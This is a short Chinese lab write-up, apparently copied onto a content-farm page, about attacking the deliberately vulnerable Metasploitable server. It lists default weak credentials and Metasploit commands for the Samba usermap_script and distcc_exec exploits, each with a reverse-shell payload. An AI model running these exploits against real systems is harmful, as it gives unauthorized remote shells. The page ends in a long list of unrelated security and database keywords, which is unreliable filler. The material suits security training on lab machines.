Samba&distcc 漏洞
发表于:2024-11-17 作者:千家信息网编辑
千家信息网最后更新 2024年11月17日,漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。使用metasploit对metasploitable 靶服务器进行***metas
千家信息网最后更新 2024年11月17日Samba&distcc 漏洞
漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。
使用metasploit
对metasploitable 靶服务器进行***
metasploitable 是ubuntu8.0的版本
neuss扫描到漏洞
139端口可以获取该系统主机名为"METASPLOITABLE",注释"metasploitable server (Samba 3.0.20-Debian)";
系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;
telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令
一个distcc漏洞
一个samba 共享服务漏洞
msf对靶服务器的工具
smb-samba 共享服务
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost (ip address)
set lhost (ip address)
exploit
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost (ip address)
set lhost (ip address)
exploit
distcc 成功 但是没有root的权限
用户
服务
漏洞
口令
系统
成功
服务器
权限
版本
开放
测试
直观
主机
信息
共享资源
命令
图片
密码
工具
数据
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
给mysql数据库增加一个表
2008服务器安装教程
网络安全进社区方案
核恐怖主义网络安全
浪潮软件 网络安全服务
游戏企业网络安全
数据库中空字符串 写法
发货单打印软件连接服务器
什么是网络安全保障体系
技术特征数据库
深岩银河服务器不可用
access数据库四川大学
腐蚀进入服务器就闪退
数据库的调用关系
僵尸网络安全吗
网络安全卫士教学反思
杭州软件开发需要什么条件
1937o服务器
郴州正规的数据库
注册页面连接数据库asp
服务器信息安全防护
汽车网络安全pdf
网络安全审计案列
魔力互联网科技有限公司产品
苹果手表蜂窝连接不上服务器
双十一网络安全教育
软件开发简历上的简介怎么写
java编写代理服务器
深南电路软件开发岗校招面试
获取服务器图片